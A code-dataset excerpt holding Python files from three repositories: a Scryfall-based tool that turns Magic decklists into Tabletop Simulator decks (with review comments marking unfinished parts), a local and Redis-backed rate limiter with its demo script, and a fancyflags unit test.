50,051 | JarLoz/flipper2 | refs/heads/master | /fliplib/deck.py | from .scryfall import getApi
from .printer import printMessage
from .card import createCard
class Deck:
    """A deck of cards to be exported as a Tabletop Simulator (TTS) deck object."""

    def __init__(self, name):
        self.mainboard = []   # list of (amount, Card) tuples
        self.sideboard = []
        self.extra = []
        self.api = getApi()
        self.name = name
        # TTS card ids: the leading digit selects the image sheet, the last
        # two digits the position on the sheet (starts at 100).
        self.nextCardId = 100

    def addCardToMainboard(self, amount, cardname):
        """Look the card up via scryfall and append (amount, card)."""
        card = createCard(cardname, self.nextCardId)
        self.mainboard.append((amount, card))
        self.nextCardId += 1
        # An image sheet holds 69 cards, so skip e.g. from 169 to 200 to
        # start numbering on the next sheet.
        if int(str(self.nextCardId)[1:]) == 69:
            self.nextCardId += 31

    def printDecklist(self):
        """Print the decklist contents for debugging."""
        for amount, card in self.mainboard:
            # Fix: Card.name is a plain string attribute, not a method.
            printMessage(str(amount) + ' ' + card.name)

    def generateTTSDeckObject(self):
        """Generate the JSON-serializable deck object that TTS uses."""
        ttsDeckObject = {'Transform': {'posX':1.0,'posY':1.0,'posZ':-0.0,'rotX':0,'rotY':180,'rotZ':180,'scaleX':1,'scaleY':1,'scaleZ':1}}
        ttsDeckObject['Name'] = 'DeckCustom'
        ttsDeckObject['Nickname'] = self.name
        containedObjects = []
        deckIds = []
        for amount, card in self.mainboard:
            cardObject = card.getTTSCardObject()
            containedObjects.append(cardObject)
            # One DeckIds entry per physical copy; the contained object is
            # shared between copies.
            for _ in range(amount):
                # Fix: getTTSCardObject returns a dict, so the id lives
                # under the 'CardID' key (cardObject.cardId raised).
                deckIds.append(cardObject['CardID'])
        ttsDeckObject['ContainedObjects'] = containedObjects
        ttsDeckObject['DeckIds'] = deckIds
        customDeck = {}
        # Fix: getDeckImages is a method of this class (was called without self).
        # NOTE(review): getDeckImages currently returns file-name strings, not
        # objects with .index/.getCustomDeckObject() -- this loop still needs
        # DeckImage instances; TODO wire DeckImage in here.
        for deckImage in self.getDeckImages():
            customDeck[deckImage.index] = deckImage.getCustomDeckObject()
        ttsDeckObject['CustomDeck'] = customDeck
        return ttsDeckObject

    def getDeckImages(self):
        """Montage the card images into 69-card sheets; return the file names."""
        imageIndex = 0
        deckImageNames = []
        for i in range(0, len(self.mainboard), 69):
            chunk = self.mainboard[i:i + 69]
            imageNames = [cardTuple[1].imageName() for cardTuple in chunk]
            # Fix: `deckName` was undefined; the deck's own name is used.
            deckImageName = self.name + '_image_' + str(imageIndex) + ".jpg"
            deckImageNames.append(deckImageName)
            # NOTE(review): callMontage, hires and output are not defined
            # anywhere in this file -- TODO import/define them.
            callMontage(imageNames, deckImageName, hires, output)
            imageIndex += 1
        return deckImageNames
| {"/fliplib/deck.py": ["/fliplib/scryfall.py", "/fliplib/card.py"], "/flipper2.py": ["/fliplib/parser.py"], "/fliplib/parser.py": ["/fliplib/deck.py", "/fliplib/scryfall.py"], "/fliplib/card.py": ["/fliplib/scryfall.py"]} |
50,052 | JarLoz/flipper2 | refs/heads/master | /flipper2.py | from fliplib.parser import readDecklist
import os
def initializeCaches():
    """Ensure the on-disk cache directories exist (idempotent)."""
    for cache_dir in ('imageCache', 'apiCache'):
        os.makedirs(cache_dir, exist_ok=True)
initializeCaches()
deck = readDecklist("decklist.txt")
# Fix: readDecklist returns None when the decklist file is missing;
# guard against calling a method on None.
if deck is not None:
    deck.printDecklist()
| {"/fliplib/deck.py": ["/fliplib/scryfall.py", "/fliplib/card.py"], "/flipper2.py": ["/fliplib/parser.py"], "/fliplib/parser.py": ["/fliplib/deck.py", "/fliplib/scryfall.py"], "/fliplib/card.py": ["/fliplib/scryfall.py"]} |
50,053 | JarLoz/flipper2 | refs/heads/master | /fliplib/parser.py | import re
from .deck import Deck
from .scryfall import ApiError
from .printer import printMessage
def readDecklist(filename):
    """
    Reads a decklist from a file.

    Returns the parsed Deck, or None when the file does not exist.
    """
    try:
        # Keep the try body minimal: only the file access should be guarded;
        # parsing errors must propagate instead of being mistaken for a
        # missing file.
        with open(filename, encoding="utf8") as decklistfile:
            decklist = decklistfile.readlines()
    except FileNotFoundError:
        printMessage("File not found!")
        return None
    return parseDecklist(decklist)
def parseDecklist(decklist, name="Unnamed deck"):
    """
    Parses a given decklist (list of lines) into a Deck containing Card objects.

    Parameters
    ----------
    decklist : list of str
        Lines of the decklist file.
    name : str, optional
        Nickname for the new deck. Fix: Deck.__init__ requires a name, so
        the original no-argument Deck() call raised TypeError; the default
        keeps existing callers working.
    """
    newDeck = Deck(name)
    for line in decklist:
        amount, cardname = parseDecklistLine(line)
        if cardname:
            try:
                newDeck.addCardToMainboard(amount, cardname)
            except ApiError as exception:
                # Unknown card: report it and keep parsing the rest.
                printMessage(exception.message)
    return newDeck
def parseDecklistLine(line):
    """
    Parses one decklist line into (amount, cardname).

    Returns (None, None) for blank lines. A leading integer token is the
    card count; otherwise the count defaults to 1.
    """
    tokens = line.split()
    if not tokens:
        return (None, None)
    # A purely numeric first token is a count.
    if re.match(r'\d+$', tokens[0]):
        return (int(tokens[0]), ' '.join(tokens[1:]))
    # Fix: the original returned the raw line here, so the card name kept
    # its trailing newline/extra whitespace; joining the tokens normalizes
    # it the same way as the counted branch.
    return (1, ' '.join(tokens))
| {"/fliplib/deck.py": ["/fliplib/scryfall.py", "/fliplib/card.py"], "/flipper2.py": ["/fliplib/parser.py"], "/fliplib/parser.py": ["/fliplib/deck.py", "/fliplib/scryfall.py"], "/fliplib/card.py": ["/fliplib/scryfall.py"]} |
50,054 | JarLoz/flipper2 | refs/heads/master | /fliplib/card.py | import os
from .scryfall import getApi
class Card:
    """A single card: its name, scryfall printings and TTS card id."""

    def __init__(self, cardname):
        self.name = cardname              # card name (plain string)
        self.selectedPrinting = None      # scryfall id of the chosen printing
        self.printings = None             # dict: scryfall id -> printing data
        self.cardId = None                # TTS card id within the deck

    def imageName(self, scryId=None):
        """Return the cached image path for a printing, downloading on demand."""
        if scryId is None:
            scryId = self.selectedPrinting
        imageName = 'imageCache/front_' + scryId + '.jpg'
        if not os.path.isfile(imageName):
            # Image not downloaded yet; fetch it through the shared client.
            api = getApi()
            url = self.printings[scryId]['image_uris']['normal']
            api.downloadImage(url, imageName)
        return imageName

    def getTTSCardObject(self):
        """Return the JSON-serializable TTS card object for this card."""
        return {
            'Name': 'Card',
            # Fix: name is a plain attribute; self.name() raised TypeError.
            'Nickname': self.name,
            'CardID': self.cardId,
            'Transform': {
                'posX': 2.5,
                'posY': 2.5,
                'posZ': 3.5,
                'rotX': 0,
                'rotY': 180,
                'rotZ': 180,
                'scaleX': 1,
                'scaleY': 1,
                'scaleZ': 1
            }
        }
def createCard(cardname, cardId):
    """Build a Card from scryfall data, resolving its known printings."""
    api = getApi()
    scryfallData = api.findCard(cardname)
    card = Card(cardname)
    card.cardId = cardId
    card.selectedPrinting = scryfallData['id']
    if 'prints_search_uri' in scryfallData.keys():
        # Multiple printings are available: resolve the full set.
        card.printings = api.findPrintings(scryfallData['oracle_id'])
    else:
        # Single known printing: use the lookup result directly.
        card.printings = {scryfallData['id']: scryfallData}
    return card
| {"/fliplib/deck.py": ["/fliplib/scryfall.py", "/fliplib/card.py"], "/flipper2.py": ["/fliplib/parser.py"], "/fliplib/parser.py": ["/fliplib/deck.py", "/fliplib/scryfall.py"], "/fliplib/card.py": ["/fliplib/scryfall.py"]} |
50,055 | JarLoz/flipper2 | refs/heads/master | /fliplib/deckimage.py | class DeckImage:
def __init__(self, index, url):
    """One face-image sheet of a TTS custom deck."""
    self.index = index        # sheet number, used as the CustomDeck key
    self.faceUrl = url        # montage image holding the card faces
    # Shared card-back image; every card on the sheet uses the same back.
    self.backUrl = 'https://i.imgur.com/P7qYTcI.png'
    self.uniqueBack = False
def getCustomDeckObject(self):
    """Return the TTS CustomDeck entry for this image sheet (10x7 grid)."""
    return {
        'NumWidth': 10,
        'NumHeight': 7,
        'FaceUrl': self.faceUrl,
        'BackUrl': self.backUrl,
        'UniqueBack': self.uniqueBack,
    }
| {"/fliplib/deck.py": ["/fliplib/scryfall.py", "/fliplib/card.py"], "/flipper2.py": ["/fliplib/parser.py"], "/fliplib/parser.py": ["/fliplib/deck.py", "/fliplib/scryfall.py"], "/fliplib/card.py": ["/fliplib/scryfall.py"]} |
50,056 | JarLoz/flipper2 | refs/heads/master | /fliplib/scryfall.py | import requests
import shutil
from time import sleep
_api = None  # module-level singleton Scryfall client; created lazily by getApi()
class Scryfall:
    """Thin caching client for the scryfall REST API."""

    def __init__(self):
        self.nameCache = {}    # card name -> card JSON
        self.printCache = {}   # oracle id -> {scryfall id: printing JSON}
        self.apiUrl = "https://api.scryfall.com"
        self.namedEndpoint = self.apiUrl + '/cards/named'
        self.searchEndpoint = self.apiUrl + '/cards/search'

    def findCard(self, cardname):
        """Return the scryfall card object for an exact card name.

        Results are cached; raises ApiError when the card is unknown.
        """
        if cardname not in self.nameCache:
            response = requests.get(self.namedEndpoint, {'exact': cardname})
            sleep(0.1)  # Let's be nice with scryfall's API.
            if response.status_code == 200:
                self.nameCache[cardname] = response.json()
            else:
                raise ApiError("Card not found!")
        return self.nameCache[cardname]

    def findPrintings(self, oracleId):
        """Return all printings for an oracle id as {scryfall id: data}.

        Results are cached; raises ApiError when the lookup fails.
        """
        if oracleId not in self.printCache:
            response = requests.get(self.searchEndpoint,
                                    {'order': 'released',
                                     'q': 'oracleid:' + oracleId,
                                     'unique': 'prints'})
            sleep(0.1)  # It's important to be nice.
            if response.status_code == 200:
                printingsResponse = response.json()
                printings = {}
                for printing in printingsResponse['data']:
                    printings[printing['id']] = printing
                self.printCache[oracleId] = printings
            else:
                raise ApiError("Printings not found!")
        # Fix: `return self.printCache[oracleId] = printings` was a
        # syntax error (assignment inside a return statement).
        return self.printCache[oracleId]

    def downloadImage(self, url, imageName):
        """Stream an image to disk; returns True on completion."""
        response = requests.get(url, stream=True)
        with open(imageName, "wb") as outfile:
            shutil.copyfileobj(response.raw, outfile)
        del response
        sleep(0.1)  # Still being very nice with scryfall.
        return True
class ApiError(Exception):
    """Raised when a Scryfall API request cannot be satisfied.

    The description is kept on .message (as before) and is also forwarded
    to Exception so that str(exc) and tracebacks show it.
    """

    def __init__(self, message):
        # BUG FIX: the original skipped Exception.__init__, so str(exc)
        # was empty in logs and tracebacks.
        super().__init__(message)
        self.message = message
def getApi():
    """Return the shared Scryfall client, constructing it on first call."""
    global _api
    if _api is None:
        _api = Scryfall()
    return _api
| {"/fliplib/deck.py": ["/fliplib/scryfall.py", "/fliplib/card.py"], "/flipper2.py": ["/fliplib/parser.py"], "/fliplib/parser.py": ["/fliplib/deck.py", "/fliplib/scryfall.py"], "/fliplib/card.py": ["/fliplib/scryfall.py"]} |
# 50,057 | hou-rong/ControlSpeed | refs/heads/master | /test.py
# coding:utf-8
"""Manual demo script exercising the controlspeed rate limiters.

The networked examples require a Redis server listening on localhost.
"""
import time

import redis

from controlspeed import ControlSpeed
from controlspeed import ControlSpeedNetwork

redis_conn = redis.StrictRedis()
key = 'hourong'


# Redis-backed limiter, usable across processes sharing the same key.
@ControlSpeedNetwork(redis_conn, key, max_calls=10, period=3.0)
def do_something(args):
    print(args)
    time.sleep(0.1)


for i in range(20):
    do_something(i)


# In-process limiter used as a decorator.
@ControlSpeed(max_calls=10, period=3.0)
def do_something(args):
    print(args)
    time.sleep(0.1)


for i in range(20):
    do_something(i)

from controlspeed import ControlSpeed

# The limiter also works directly as a context manager.
rate = ControlSpeed(max_calls=10, period=3.0)
for i in range(15):
    with rate:
        print(i)


def limited(until):
    duration = int(round(until))
    print('Speed limited, sleeping for %d seconds' % duration)


for i in range(20):
    print(i)

# A callback fires (on a daemon thread) whenever the limiter throttles.
rate = ControlSpeed(max_calls=2, period=3, callback=limited)
for i in range(3):
    with rate:
        print(i)

from controlspeed import SpeedSetter

# Dynamic limits: SpeedSetter writes them into Redis and a dynamic=True
# network limiter re-reads them on every call.
speed_setter = SpeedSetter(redis_conn, key)
speed_setter.max_calls = 2
speed_setter.period = 2


@ControlSpeedNetwork(redis_conn, key, max_calls=10, period=3.0, dynamic=True)
def do_something(args):
    print(args)
    time.sleep(0.1)


for i in range(40):
    if i == 14:
        speed_setter.max_calls = 8
    do_something(i)
50,058 | hou-rong/ControlSpeed | refs/heads/master | /controlspeed/__init__.py | # conding:utf-8
import collections
import functools
import threading
import time
import pickle
from controlspeed.local_mutex import LocalMutex, LockError
class ControlSpeed(object):
    """Sliding-window rate limiter usable as a decorator or context manager.

    Keeps the timestamps of the most recent `max_calls` calls and, on
    entry, sleeps long enough that at most `max_calls` calls happen per
    `period` seconds.  When `multi` is truthy the call history is shared
    between processes via a pickle file guarded by a LocalMutex lock file.
    """

    def __init__(self, multi=None, max_calls=0, period=1.0, callback=None):
        """Configure the limiter.

        Args:
            multi: truthy to share state across processes through
                'tmp.file' (history) and 'lock.file' (mutex).
            max_calls: maximum calls allowed per window; must be > 0.
            period: window length in seconds; must be > 0.
            callback: optional callable invoked with the sleep duration
                (on a daemon thread) whenever the limiter throttles.

        Raises:
            ValueError: if `period` or `max_calls` is not positive.
        """
        if period <= 0:
            raise ValueError('Speed limiting period must be > 0')
        if max_calls <= 0:
            raise ValueError('Speed limiting number of calls must be > 0')
        self.multi = multi
        if self.multi:
            self.filename = 'tmp.file'
            self.lock = 'lock.file'
        self.calls = collections.deque()
        self.period = period
        self.max_calls = max_calls
        self.callback = callback

    def __call__(self, f):
        """Decorator support: every call to `f` passes through the limiter."""
        @functools.wraps(f)
        def wrapped(*args, **kwargs):
            with self:
                return f(*args, **kwargs)
        return wrapped

    def __enter__(self):
        self.judge_load()
        if len(self.calls) >= self.max_calls:
            last = self._time_span
            if last >= self.period:
                until = 0
            else:
                until = self.period - last
            if self.callback:
                t = threading.Thread(target=self.callback, args=(until,))
                t.daemon = True
                t.start()
            time.sleep(until)
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Record this call, then trim history to the window size.
        self.calls.append(time.time())
        while len(self.calls) > self.max_calls:
            self.calls.popleft()
        self.judge_dump()

    @property
    def _time_span(self):
        """Seconds between the oldest and newest recorded call."""
        if self.multi:
            self.load()
        return self.calls[-1] - self.calls[0]

    # will add more mode, threading
    def judge_dump(self):
        """Persist the call history, but only in shared (multi) mode."""
        if self.multi:
            self.dump()

    def judge_load(self):
        """Refresh the call history from disk, but only in shared (multi) mode."""
        if self.multi:
            self.load()

    def dump(self):
        """Write the call history to the shared pickle file under the lock."""
        with LocalMutex(self.lock, wait=True):
            # BUG FIX: pickle needs a binary-mode file ("w" raises TypeError
            # on Python 3), and the original never closed the handle.
            with open(self.filename, "wb") as fp:
                pickle.dump(self.calls, fp)

    def load(self):
        """Read the call history from the shared pickle file under the lock."""
        with LocalMutex(self.lock, wait=True):
            try:
                # BUG FIX: binary mode for pickle, and close the handle.
                with open(self.filename, "rb") as fp:
                    self.calls = pickle.load(fp)
            except OSError:
                # First use in multi mode: no history persisted yet.
                pass
class ControlSpeedNetwork(object):
    """Rate limiter whose call history lives in Redis (shared across hosts).

    Works as a decorator or a context manager.  With dynamic=True, the
    limits are re-read from Redis on every access instead of using the
    values fixed at construction time.
    """

    def __init__(self, redis_conn, key, max_calls=0, period=1.0,
                 callback=None, dynamic=False):
        if period <= 0:
            raise ValueError('Speed limiting period must be > 0')
        if max_calls <= 0:
            raise ValueError('Speed limiting number of calls must be > 0')
        self.mq = MQ(redis_conn, key)
        self.callback = callback
        self.dynamic = dynamic
        self.max_calls_setting = max_calls
        self.period_setting = period

    def __call__(self, f):
        """Decorator support: every call to `f` passes through the limiter."""
        @functools.wraps(f)
        def limited(*args, **kwargs):
            with self:
                return f(*args, **kwargs)
        return limited

    def __enter__(self):
        if self.mq.llen() >= self.max_calls:
            elapsed = self._time_span
            wait = self.period - elapsed if elapsed < self.period else 0
            if self.callback:
                notifier = threading.Thread(target=self.callback, args=(wait,))
                notifier.daemon = True
                notifier.start()
            time.sleep(wait)
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Record this call in Redis, then trim history to the window size.
        self.mq.rpush(time.time())
        while self.mq.llen() > self.max_calls:
            self.mq.lpop()

    @property
    def _time_span(self):
        """Seconds between the oldest and newest call recorded in Redis."""
        return self.mq.lrange(-1) - self.mq.lrange(0)

    @property
    def _last_point(self):
        """Seconds elapsed since the most recent recorded call."""
        return time.time() - self.mq.lrange(-1)

    @property
    def max_calls(self):
        return self.mq.max_calls if self.dynamic else self.max_calls_setting

    @property
    def period(self):
        return self.mq.period if self.dynamic else self.period_setting
class MQ(object):
    """Wrapper around the Redis keys used by a limiter.

    The list at `key` holds call timestamps; the tunable limits live at
    `<key>-max-calls` and `<key>-period`.
    """

    def __init__(self, redis_conn, key):
        self.redis_conn = redis_conn
        self.key = key
        # Precomputed key names for the dynamic-limit values.
        self._max_calls_key = key + '-max-calls'
        self._period_key = key + '-period'

    def llen(self):
        """Number of recorded timestamps."""
        return self.redis_conn.llen(self.key)

    def rpush(self, item):
        """Append a timestamp at the right end of the list."""
        return self.redis_conn.rpush(self.key, item)

    def lpop(self):
        """Remove and return the oldest timestamp."""
        return self.redis_conn.lpop(self.key)

    def lrange(self, offset):
        """Return the timestamp at `offset` (negative indexes allowed) as float."""
        return float(self.redis_conn.lrange(self.key, offset, offset)[0])

    @property
    def max_calls(self):
        """Dynamic call limit stored in Redis, or -1.0 when unset."""
        return float(self.redis_conn.get(self._max_calls_key) or -1.0)

    @max_calls.setter
    def max_calls(self, value):
        self.redis_conn.set(self._max_calls_key, value)

    @property
    def period(self):
        """Dynamic window length stored in Redis, or -1.0 when unset."""
        return float(self.redis_conn.get(self._period_key) or -1.0)

    @period.setter
    def period(self, value):
        self.redis_conn.set(self._period_key, value)
class SpeedSetter(MQ):
    """Public alias of MQ for tuning the dynamic limits (max_calls, period)
    that a dynamic ControlSpeedNetwork limiter reads from Redis."""
    pass
| {"/test.py": ["/controlspeed/__init__.py"]} |
50,059 | corypaik/fancyflags | refs/heads/master | /fancyflags/_flags_test.py | # Copyright 2021 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for fancyflags._flags."""
from absl import flags
from absl.testing import absltest
from fancyflags import _flags
class FlagsTest(absltest.TestCase):
  """Checks that ItemFlag/MultiItemFlag write their values through to a
  shared dictionary, both on assignment and on command-line parsing."""

  def test_update_shared_dict(self):
    # Single-valued flag: both `.value = ...` and re-parsing must update
    # the shared dict at the flag's namespace.
    state = {'a': {'b': 'value'}}
    fv = flags.FlagValues()
    flags.DEFINE_flag(
        _flags.ItemFlag(
            state,
            ('a', 'b'),
            parser=flags.ArgumentParser(),
            serializer=flags.ArgumentSerializer(),
            name='a.b',
            default='bar',
            help_string='help string'),
        flag_values=fv)

    fv['a.b'].value = 'new_value'
    with self.subTest(name='setter'):
      self.assertEqual(state, {'a': {'b': 'new_value'}})

    fv(('./program', '--a.b=override'))
    with self.subTest(name='override_parse'):
      self.assertEqual(state, {'a': {'b': 'override'}})

  def test_update_shared_dict_multi(self):
    # Multi-valued flag: same write-through contract with list values.
    state = {'a': {'b': ['value']}}
    fv = flags.FlagValues()
    flags.DEFINE_flag(
        _flags.MultiItemFlag(
            state,
            ('a', 'b'),
            parser=flags.ArgumentParser(),
            serializer=flags.ArgumentSerializer(),
            name='a.b',
            default=['foo', 'bar'],
            help_string='help string'),
        flag_values=fv)

    fv['a.b'].value = ['new', 'value']
    with self.subTest(name='setter'):
      self.assertEqual(state, {'a': {'b': ['new', 'value']}})

    fv(('./program', '--a.b=override1', '--a.b=override2'))
    with self.subTest(name='override_parse'):
      self.assertEqual(state, {'a': {'b': ['override1', 'override2']}})
# Allow running this test module directly.
if __name__ == '__main__':
  absltest.main()
| {"/fancyflags/_flags_test.py": ["/fancyflags/__init__.py"], "/fancyflags/examples/example_module.py": ["/fancyflags/__init__.py"], "/fancyflags/_auto.py": ["/fancyflags/__init__.py"], "/fancyflags/_define_auto_test.py": ["/fancyflags/__init__.py"], "/fancyflags/_define_auto.py": ["/fancyflags/__init__.py"], "/fancyflags/examples/override_test.py": ["/fancyflags/__init__.py"], "/fancyflags/_auto_test.py": ["/fancyflags/__init__.py"], "/fancyflags/_flagsaver_test.py": ["/fancyflags/__init__.py"], "/fancyflags/_definitions_test.py": ["/fancyflags/__init__.py"], "/fancyflags/_argument_parsers_test.py": ["/fancyflags/__init__.py"], "/fancyflags/_definitions.py": ["/fancyflags/__init__.py"]} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.